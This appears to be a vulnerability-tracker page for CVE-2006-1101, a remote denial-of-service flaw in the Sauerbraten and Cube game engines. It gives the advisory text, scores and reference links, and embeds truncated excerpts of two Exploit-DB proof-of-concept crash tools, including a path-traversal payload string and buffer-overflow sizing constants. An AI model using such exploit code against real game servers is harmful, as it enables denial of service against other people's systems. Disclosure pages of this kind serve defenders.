CVE-2006-1101
published 2006-03-09CVE-2006-1101: The (1) sgetstr and (2) getint functions in Sauerbraten 2006_02_28, as derived from the Cube engine, allow remote attackers to cause a denial of service…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
4.99%
91.1th percentile
The (1) sgetstr and (2) getint functions in Sauerbraten 2006_02_28, as derived from the Cube engine, allow remote attackers to cause a denial of service (segmentation fault) via long streams of input data that trigger an out-of-bounds read, as demonstrated using SV_EXT tag data in the Cube engine, which is not properly handled by getint.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sauerbraten | cube | — | — |
| sauerbraten | sauerbraten | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cube 2005_08_29 - Multiple Buffer Overflow / Crash
exploitdb·2006-03-06
CVE-2006-1101 Cube 2005_08_29 - Multiple Buffer Overflow / Crash
Cube 2005_08_29 - Multiple Buffer Overflow / Crash
---
/*
by Luigi Auriemma
You NEED Enet for compiling this tool (then remember -lenet)
http://enet.bespin.org / http://enet.cubik.org
*/
#include
#include
#include
#include
#define VER "0.1"
#define PORT 28765
#define MAXTRANS 5000
#define BOFSZ (MAXTRANS + 2400)
#define MAPSUX "base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../readme.txt"
// when encoding is activated (all the pre-compiled client/server) the valid
// tag types are 0, 9, 11, 18, 19, 20, 23, 24, 26, 31 instead of the following
// values
enum {
SV_INITS2C, SV_INITC2S, SV_POS, SV
Exploit-DB
Sauerbraten 2006_02_28 - Multiple Buffer Overflow / Crash
exploitdb·2006-03-06
CVE-2006-1103 Sauerbraten 2006_02_28 - Multiple Buffer Overflow / Crash
Sauerbraten 2006_02_28 - Multiple Buffer Overflow / Crash
---
/*
by Luigi Auriemma
You NEED Enet for compiling this tool (then remember -lenet)
http://enet.bespin.org / http://enet.cubik.org
*/
#include
#include
#include
#include
#include
#ifdef WIN32
#include
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include
#include
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error =
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/evilcube-adv.txthttp://secunia.com/advisories/19110http://secunia.com/advisories/19111http://secunia.com/advisories/19199http://www.gentoo.org/security/en/glsa/glsa-200603-10.xmlhttp://www.securityfocus.com/archive/1/426865/100/0/threadedhttp://www.securityfocus.com/archive/1/426867/100/0/threadedhttp://www.securityfocus.com/bid/16986http://www.vupen.com/english/advisories/2006/0847http://www.vupen.com/english/advisories/2006/0848https://exchange.xforce.ibmcloud.com/vulnerabilities/25085http://aluigi.altervista.org/adv/evilcube-adv.txthttp://secunia.com/advisories/19110http://secunia.com/advisories/19111http://secunia.com/advisories/19199http://www.gentoo.org/security/en/glsa/glsa-200603-10.xmlhttp://www.securityfocus.com/archive/1/426865/100/0/threadedhttp://www.securityfocus.com/archive/1/426867/100/0/threadedhttp://www.securityfocus.com/bid/16986http://www.vupen.com/english/advisories/2006/0847http://www.vupen.com/english/advisories/2006/0848https://exchange.xforce.ibmcloud.com/vulnerabilities/25085
2006-03-09
Published